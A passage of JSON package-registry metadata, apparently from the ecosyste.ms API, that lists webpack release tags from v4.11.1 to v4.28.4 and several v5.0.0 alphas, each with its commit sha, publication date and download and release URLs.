b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifest